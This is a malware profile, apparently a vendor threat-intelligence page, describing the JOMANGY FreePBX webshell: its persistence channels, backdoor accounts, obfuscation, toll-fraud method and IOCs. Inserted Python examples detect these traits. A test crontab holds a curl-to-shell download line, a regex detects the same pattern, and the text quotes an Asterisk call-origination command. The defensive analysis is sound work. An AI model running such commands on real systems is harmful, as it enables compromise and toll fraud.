
JOMANGY


JOMANGY is a PHP webshell and backdoor family targeting vulnerable FreePBX servers. It is designed to establish long-term access to compromised VoIP infrastructure, enable toll fraud, and survive remediation attempts through multiple self-reinforcing persistence mechanisms. Unlike many traditional webshells, JOMANGY employs a highly resilient architecture that can automatically restore itself even after partial removal.

Type: Backdoor
Origin: Unknown
First seen: 1 May, 2026
Last seen: 8 June, 2026



Inside JOMANGY: A Resilient FreePBX Malware Built to Survive Cleanup Attempts

Key Takeaways

  • JOMANGY is a newly documented PHP webshell first described in May 2026, developed by the financially motivated threat actor INJ3CTOR3, and targeting FreePBX-based VoIP phone systems with the explicit goal of generating toll fraud revenue.

  • Six self-reinforcing persistence channels make JOMANGY extraordinarily difficult to remove — any single surviving channel rebuilds the full infection within minutes, rendering partial remediation useless.

  • 18 hidden backdoor accounts (nine with full root-level privileges) are planted on every infected host, with account names deliberately mimicking legitimate FreePBX system accounts to evade manual audits.

  • Double-layer obfuscation (Base64 over ROT13) combined with active payload rotation gives JOMANGY near-zero antivirus detection rates at the time of initial deployment, making signature-based defenses unreliable for initial detection.

  • The financial risk is direct and immediate. JOMANGY's embedded toll fraud code uses the victim's own SIP trunks to generate call charges that are billed straight to the organization, with losses potentially reaching tens of thousands of dollars before the fraud is discovered.

  • Patch cadence is a critical gap. With hundreds of systems from the January 2026 campaign still infected five months later, organizations must treat FreePBX vulnerability patching as an urgent priority and never expose the admin panel directly to the internet.

  • Proactive threat intelligence is essential against rapidly evolving campaigns. Use ANY.RUN Threat Intelligence Lookup to instantly check your environment for known JOMANGY IOCs, C2 addresses, and campaign artifacts, and subscribe to ANY.RUN Threat Intelligence Feeds to automatically push fresh, machine-readable JOMANGY indicators into your SIEM, firewall, and EDR — staying ahead of the attacker's infrastructure rotation before it costs you.

    destinationIP:"160.119.69.4".

IP linked to JOMANGY in TI Lookup

What is JOMANGY?

JOMANGY is a PHP webshell family first identified and publicly documented in May 2026 by Cyble Research & Intelligence Labs (CRIL). It was deployed as part of an active campaign against internet-exposed FreePBX servers, the widely used open-source PBX (Private Branch Exchange) interface that manages Asterisk-based business phone systems.

The webshell's most defining characteristic is its self-healing architecture. Rather than relying on a single method of persistence, JOMANGY establishes six independent channels that protect and restore each other. If an administrator removes one component, the remaining channels automatically rebuild the full infection, typically within minutes. This design makes partial remediation functionally useless.

Beyond persistence, JOMANGY carries live toll fraud code embedded directly into every deployed instance. This code is capable of initiating outbound phone calls through the victim's own SIP trunks, routing them to premium-rate numbers controlled by the attacker. The victim's carrier then bills the victim for all those calls — sometimes accumulating thousands of dollars in fraudulent charges before the fraud is even detected.

JOMANGY is deployed alongside ZenharR, another webshell previously attributed to the INJ3CTOR3 actor lineage, and a component called license.php — a privileged PHP executor embedded into FreePBX's high-availability infrastructure that operates without authentication controls.

Every JOMANGY sample recovered during analysis carries the same hardcoded watermark string — trace_e1ebf9066a951be519a24140711839ea — tying all known instances back to a single development source and confirming the campaign's centralized origin.

ANY.RUN Interactive Sandbox lets analysts investigate JOMANGY behavior in real time, validate detection coverage, and observe webshell deployment, persistence mechanisms, and outbound C2 activity.


JOMANGY detonated in Interactive Sandbox

MITRE ATT&CK techniques observed include:

  • Persistence via cron jobs and Unix shell configuration abuse;
  • Defense evasion through log clearing, timestomping, and firewall modification;
  • Credential access targeting /etc/passwd and /etc/shadow;
  • Competitive eviction of other webshells from compromised systems;
  • VoIP/SIP abuse supporting toll fraud operations.

MITRE ATT&CK techniques observed in JOMANGY

The execution chain follows the sequence:

  • Vulnerable FreePBX instance;
  • Exploit public vulnerabilities;
  • Bash stager deployment;
  • JOMANGY webshell deployment;
  • Multiple persistence mechanisms;
  • Self-healing loop;
  • VoIP/SIP abuse.

The Sandbox completes each malware sample analysis with an actionable Tier 1 report, including an AI summary and AI recommendations on detection and containment.

Tier 1 report (abstract)

How JOMANGY Threatens Businesses and Organizations

JOMANGY presents several distinct and compounding threats to any organization running FreePBX infrastructure:

Financial harm through toll fraud. By routing calls through compromised SIP trunks to international premium-rate numbers, a scheme known as International Revenue Share Fraud (IRSF), attackers generate revenue while the victim receives the bill from their telecom carrier.

Persistent, near-unremovable system compromise. JOMANGY's six-layer persistence model means that cleaning an infection is not a matter of deleting a few files. As documented by researchers, as many as 700 of the systems compromised in the January 2026 campaign wave remained infected five months after public disclosure, despite patches being available.

Complete administrative control. The 18 backdoor accounts planted by JOMANGY (nine of them with root-equivalent (UID-0) privileges) give attackers persistent, privileged access to the underlying OS. Account names are deliberately disguised to blend into the legitimate account inventory (e.g., asterisk, freepbxuser, spamfilter), making manual detection extremely difficult without specialized tooling.

Competitive territorial control. JOMANGY's dropper actively removes over 50 competing webshell signatures and blocks 11 rival C2 IP addresses, ensuring that the compromised system becomes the exclusive property of INJ3CTOR3. This behavior reflects the professionalization of the VoIP fraud underground, where compromised PBX access is a commodity with real market value.

Near-zero AV detection at deployment. Because the attacker actively rotates the payload contents using double-layer obfuscation (Base64 over ROT13), JOMANGY typically achieves near-zero detection rates across major antivirus engines at the time of initial deployment, giving the attack a wide window of opportunity before defenses catch up.


Victimology: Who Is Most Vulnerable?

JOMANGY primarily targets organizations operating internet-facing FreePBX infrastructure.

Most Vulnerable Sectors

Industries threatened by JOMANGY

The attacker's C2-hosted reconnaissance inventory of 3,080 IP addresses, approximately 39% of which pointed to Alibaba Cloud infrastructure, indicates a globally distributed, opportunistic campaign targeting organizations across the Asia-Pacific region, Latin America, and the Middle East, as well as Europe and North America.

Any organization that has not recently audited its FreePBX version, restricted web panel access, or reviewed its SIP trunk usage for anomalies should treat this as an urgent action item.

How JOMANGY Gets Into Systems and Spreads

JOMANGY gains initial access by exploiting vulnerabilities in FreePBX's web management interface. Researchers identified two candidate CVEs as likely entry points for the 2026 campaign:

  • CVE-2025-64328 — A post-authentication command injection vulnerability in the FreePBX Endpoint Manager's administrative interface, previously exploited in the January 2026 EncystPHP campaign.

  • CVE-2025-57819 — A pre-authentication SQL injection vulnerability in the FreePBX Endpoint module via cron jobs, with a public proof-of-concept from WatchTowr Labs whose artifacts the JOMANGY dropper explicitly attempts to clean up.

Once initial access is achieved, a multi-stage Bash dropper is deployed to the host. The dropper performs the following sequence:

  • Evicts over 50 competing webshell signatures and blocks 11 rival C2 IP addresses via firewall rules, eliminating competition and monopolizing the host.
  • Deletes all artifacts from INJ3CTOR3's own prior January 2026 campaign, migrating the active botnet to new infrastructure cleanly.
  • Drops the JOMANGY webshell across multiple locations in the FreePBX web root — more than 12 distinct file paths — many protected with chattr +i to make them immutable even to root.
  • Deploys ZenharR alongside JOMANGY for additional remote command execution capability.
  • Plants 18 backdoor accounts (nine UID-0, eight service-tier, one MySQL-injected FreePBX panel account).
  • Establishes six independent persistence channels.
  • Connects to the C2 server to report the new infection and begin receiving toll fraud instructions.

The malware also replicates JOMANGY into 15 additional locations within the web root as part of its propagation logic, ensuring maximum redundancy. The C2 server hosts a file called people2.txt containing 3,080 target IP addresses, representing the automated reconnaissance output used to feed new exploitation attempts.

How Does JOMANGY Malware Function?

JOMANGY's operation can be broken into three functional domains: evasion, persistence, and monetization.

Evasion

Every JOMANGY sample uses double-layer obfuscation. An outer Base64 layer wraps a PHP string which, when decoded, applies the ROT13 cipher to a second encoded layer and then executes the result on the server. The threat actor rotates the payload contents between deployments, which produces distinct file hashes across samples and keeps antivirus detection rates near zero at the time of initial deployment. The consistent internal watermark (trace_e1ebf9066a951be519a24140711839ea) is the forensic thread linking all variants to a common source despite the hash diversity.
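As an added example (not code from the page or from the researchers), the following Python scanner unwraps the Base64-over-ROT13 layering described above and shows why the file hash is useless as a signature while the watermark survives; the PAYLOAD, the junk comment and the sample builder are constructed test artifacts, not real JOMANGY code.

```python
import base64
import binascii
import codecs
import hashlib
import re

# Watermark string the page reports in every JOMANGY sample.
WATERMARK = "trace_e1ebf9066a951be519a24140711839ea"
# Hypothetical innermost payload for building test artifacts only: it carries the
# watermark in a comment and a placeholder instead of any webshell logic.
PAYLOAD = "<?php /* %s */ echo(PAYLOAD_BODY_PLACEHOLDER); ?>" % WATERMARK
# The two PHP decoding primitives the page names; the quoted literal is group 1.
_B64 = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")
_ROT = re.compile(r"str_rot13\(\s*'([^']*)'\s*\)")


def peel_layers(source, max_depth=8):
    """Unwrap base64_decode('...') and str_rot13('...') literals until none remain.
    Returns (innermost_text, layer_names_in_decoding_order)."""
    text, layers = source, []
    for _ in range(max_depth):
        m = _B64.search(text)
        if m:
            try:
                text = base64.b64decode(m.group(1)).decode("utf-8", "replace")
            except binascii.Error:
                break
            layers.append("base64")
            continue
        m = _ROT.search(text)
        if m:
            text = codecs.decode(m.group(1), "rot_13")
            layers.append("rot13")
            continue
        break
    return text, layers


def scan(source):
    """Verdict for one PHP file: the hash, which payload rotation changes per
    sample, beside the layer-independent indicators that do not change."""
    inner, layers = peel_layers(source)
    return {
        "sha256": hashlib.sha256(source.encode()).hexdigest(),
        "layers": layers,
        "watermark": WATERMARK in inner,
        "eval_wrapped": bool(re.search(r"eval\(\s*(base64_decode|str_rot13)\(", source)),
    }


def build_constructed_sample(junk):
    """Constructed test artifact, not a real sample: Base64 outer layer over a
    ROT13 inner layer, with a junk comment standing in for payload rotation."""
    inner = "<?php /* %s */ eval(str_rot13('%s')); ?>" % (junk, codecs.encode(PAYLOAD, "rot_13"))
    return "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(inner.encode()).decode()


if __name__ == "__main__":   # two "rotated" builds: different hashes, same watermark verdict
    print(scan(build_constructed_sample("rev1")), scan(build_constructed_sample("rev2")))
```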

Persistence (Six Independent Channels)

The six persistence mechanisms are designed so that any single surviving channel can fully rebuild the infection:

  • Cron-based C2 polling — A cron job polls the attacker's C2 server every one to three minutes, ready to receive new commands or re-download components.
  • Shell profile injection — Malicious code is injected into shell profile files, firing whenever root logs in or the system reboots.
  • Immutable crontab backups — Eight crontab backup copies are protected with chattr +i (making them undeletable without removing the immutable flag first), monitored by two dedicated restore cron loops that continuously verify and repair the others.
  • Process watchdog — A dedicated watchdog process monitors for the absence of the beacon process and immediately re-downloads the dropper if it disappears.
  • Immutable webshell copies — JOMANGY is replicated across more than twelve web root paths, many locked immutable, so that a single HTTP request to any surviving copy rebuilds the full infection stack.
  • Self-reinstalling PHP executor (license.php) — A PHP executor embedded within FreePBX's high-availability (HA) module provides privileged command execution independently of all other channels. It contains no authentication controls and relies on remotely supplied format-string placeholders before activation — making it a particularly dangerous backstop.
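An added host-audit example, not from the page or from Cyble: it checks three of the persistence channels listed above (extra UID-0 accounts, fast-polling or chattr-protecting cron entries, immutable files under the web root) against constructed /etc/passwd, crontab and lsattr -R output; the account names, file paths and the 203.0.113.10 address are made-up test data.

```python
import re

# Constructed inputs emulating what a responder pulls from a FreePBX host
# (not real artifacts): /etc/passwd, root's crontab and `lsattr -R` output.
PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:995:995::/var/lib/asterisk:/sbin/nologin
spamfilter:x:0:0::/var/lib/spamfilter:/bin/bash
freepbxuser:x:0:0::/tmp:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
"""
CRONTAB = """0 3 * * * /usr/sbin/fwconsole backup --id=1
*/2 * * * * curl -s http://203.0.113.10/beacon.sh | sh
* * * * * chattr +i /var/spool/cron/root.bak1
"""
LSATTR = """--------------e------- /var/www/html/index.php
----i---------e------- /var/www/html/admin/.cache.php
----i---------e------- /var/www/html/assets/.tmp.php
"""
# Schedules firing every 1-3 minutes (the page's C2 polling interval).
FAST_CRON = re.compile(r"^(\*|\*/[1-3]) (\* ){4}")
# Download-and-execute pipelines typical of a stager re-fetch.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")


def extra_uid0_accounts(passwd):
    """Accounts with UID 0 other than root; JOMANGY plants nine of them under
    names that imitate legitimate FreePBX users."""
    hits = []
    for line in passwd.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[2] == "0" and f[0] != "root":
            hits.append(f[0])
    return hits


def suspicious_cron(crontab):
    """Fast-firing entries that re-fetch a stager or pin crontab backups immutable."""
    return [e for e in crontab.splitlines()
            if FAST_CRON.match(e) and (FETCH_EXEC.search(e) or "chattr +i" in e)]


def immutable_web_files(lsattr_out, web_root="/var/www/html"):
    """Paths under the web root carrying the immutable (i) flag, parsed from
    `lsattr -R` lines of the form '<flags> <path>'; chattr -i them before deleting."""
    hits = []
    for line in lsattr_out.splitlines():
        flags, _, path = line.partition(" ")
        if "i" in flags and path.startswith(web_root):
            hits.append(path)
    return hits


def audit(passwd=PASSWD, crontab=CRONTAB, lsattr_out=LSATTR):
    """Run the three checks and return one findings dict."""
    return {"uid0_accounts": extra_uid0_accounts(passwd),
            "cron": suspicious_cron(crontab),
            "immutable": immutable_web_files(lsattr_out)}


if __name__ == "__main__":
    print(audit())
```

Any single finding from these checks is grounds to treat the host as fully compromised and rebuild it, since the page notes that one surviving channel restores the others.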

Monetization (Toll Fraud)

Every deployed JOMANGY instance carries active VoIP toll fraud code. Attackers use Asterisk CLI commands — such as asterisk -rx "channel originate Local/@" — to initiate outbound calls through the victim's own SIP trunks. These calls are routed to international premium-rate numbers (IPRNs) controlled by the attacker. The victim's telecom carrier charges the victim's account for all generated call volume. This method generates revenue with minimal operational overhead and leaves no ransomware artifacts for incident responders to follow.
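Added CDR-hunting example, not the page's or Asterisk's own code: it flags international calls on a Local/ channel, the channel type that asterisk -rx "channel originate Local/..." produces, when they arrive in bursts or out of hours. It assumes the default Master.csv column order, and the SAMPLE_ROWS below are constructed records.

```python
import csv
import io
from collections import Counter

# Default Asterisk Master.csv column order (assumption: verify against your cdr_csv setup).
CDR_FIELDS = ["accountcode", "src", "dst", "dcontext", "clid", "channel", "dstchannel",
              "lastapp", "lastdata", "start", "answer", "end", "duration", "billsec",
              "disposition", "amaflags", "uniqueid", "userfield"]
INTL_PREFIXES = ("011", "00", "+")


def load_master_csv(text):
    """Parse Master.csv text (no header row) into dicts keyed by CDR_FIELDS."""
    return list(csv.DictReader(io.StringIO(text), fieldnames=CDR_FIELDS))


def is_cli_originated(row):
    """A Local/ channel is what 'channel originate Local/...' from the Asterisk
    CLI produces, as opposed to a registered phone (PJSIP/SIP channel) dialling."""
    return row["channel"].startswith("Local/")


def flag_toll_fraud(rows, burst_threshold=3, business_hours=(7, 20)):
    """Return uniqueids of CLI-originated international calls that occur in a
    burst (>= burst_threshold within one clock hour) or outside business hours."""
    candidates = [r for r in rows if is_cli_originated(r) and r["dst"].startswith(INTL_PREFIXES)]
    per_hour = Counter(r["start"][:13] for r in candidates)   # key "YYYY-MM-DD HH"
    flagged = []
    for r in candidates:
        hour = int(r["start"][11:13])
        off_hours = not (business_hours[0] <= hour < business_hours[1])
        if off_hours or per_hour[r["start"][:13]] >= burst_threshold:
            flagged.append(r["uniqueid"])
    return flagged


# Constructed CDR rows (not real data), already in the dict form load_master_csv yields.
# 020 7946 0xxx is a reserved fictional UK range; 00999... is a non-existent country code.
SAMPLE_ROWS = [
    {"src": "1001", "dst": "5551234567", "channel": "PJSIP/1001-00000001",
     "start": "2026-06-08 10:15:02", "uniqueid": "c1"},
    {"src": "1002", "dst": "01144207946000", "channel": "PJSIP/1002-00000002",
     "start": "2026-06-08 11:02:40", "uniqueid": "c2"},   # a desk phone dialling abroad
    {"src": "", "dst": "0099900000001", "channel": "Local/s@from-internal-00000003;2",
     "start": "2026-06-08 03:10:05", "uniqueid": "c3"},
    {"src": "", "dst": "0099900000002", "channel": "Local/s@from-internal-00000004;2",
     "start": "2026-06-08 03:10:09", "uniqueid": "c4"},
    {"src": "", "dst": "0099900000003", "channel": "Local/s@from-internal-00000005;2",
     "start": "2026-06-08 03:10:14", "uniqueid": "c5"},
    {"src": "", "dst": "0099900000004", "channel": "Local/s@from-internal-00000006;2",
     "start": "2026-06-08 14:30:00", "uniqueid": "c6"},   # lone daytime call, below threshold
]

if __name__ == "__main__":
    print(flag_toll_fraud(SAMPLE_ROWS))   # ['c3', 'c4', 'c5']
```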

How Businesses Can Use ANY.RUN’s Threat Intelligence Feeds and TI Lookup Against JOMANGY

Understanding a threat is only half the battle: organizations need actionable intelligence to defend against it proactively. ANY.RUN's Threat Intelligence Feeds and Threat Intelligence Lookup are purpose-built for exactly this kind of defense.

ANY.RUN Threat Intelligence Feeds deliver a continuously refreshed stream of high-confidence, machine-readable IOCs in formats compatible with SIEMs, firewalls, EDR platforms, and SOAR playbooks.

For a campaign like JOMANGY, where the attacker actively rotates payload hashes and migrates C2 infrastructure, having a real-time feed that captures fresh indicators as the campaign evolves is critical. Security teams can automatically block newly identified JOMANGY C2 addresses, flag access attempts to known malicious paths in the FreePBX web root, and alert on behavioral indicators such as the characteristic cron injection patterns used by the malware.

TI Feeds benefits and integration

ANY.RUN Threat Intelligence Lookup allows security teams to instantly query a continuously updated threat intelligence database for indicators of compromise (IOCs) directly associated with JOMANGY and the broader INJ3CTOR3 campaign.

Security analysts can search for known malicious IP addresses (including the 3,080-entry target inventory hosted on JOMANGY's C2), file hashes of JOMANGY and ZenharR samples, the campaign's unique watermark string (trace_e1ebf9066a951be519a24140711839ea), suspicious file paths dropped during infection, and known C2 domain and infrastructure details.

TI Lookup reveals two active JOMANGY infrastructure clusters tied to attacker-controlled C2 servers, with activity traced back to April 2026. This visibility helps threat hunters uncover related activity, identify compromised environments, and track infrastructure reuse across campaigns:

destinationIP:"160.119.69.4" OR destinationIP:"45.95.147.178".

JOMANGY infrastructure in TI Lookup

Organizations should also:

  • Patch FreePBX systems promptly;
  • Restrict internet exposure of management interfaces;
  • Monitor SIP activity for unusual call patterns;
  • Enable multi-factor authentication;
  • Audit privileged accounts regularly;
  • Monitor cron jobs and startup scripts;
  • Use EDR and server monitoring solutions;
  • Segment VoIP infrastructure from business-critical systems;
  • Rebuild compromised systems from clean images when infection is confirmed.

Researchers emphasize that partial cleanup may be ineffective due to JOMANGY's self-healing capabilities.


Conclusion

JOMANGY represents a sophisticated evolution of VoIP-focused malware. While its primary objective is financial gain through toll fraud, its extensive persistence mechanisms, hidden accounts, and self-healing architecture make it a serious threat to organizations relying on FreePBX infrastructure.

For defenders, rapid visibility into malicious infrastructure, continuous threat intelligence, and proactive hunting are critical for detecting attacks before they result in substantial financial losses or long-term compromise. Combining strong patch management with threat intelligence-driven monitoring can significantly reduce exposure to emerging threats such as JOMANGY.

Try TI Lookup to start gathering actionable threat intelligence on the malware that threatens your business sector and region: just sign up to ANY.RUN.
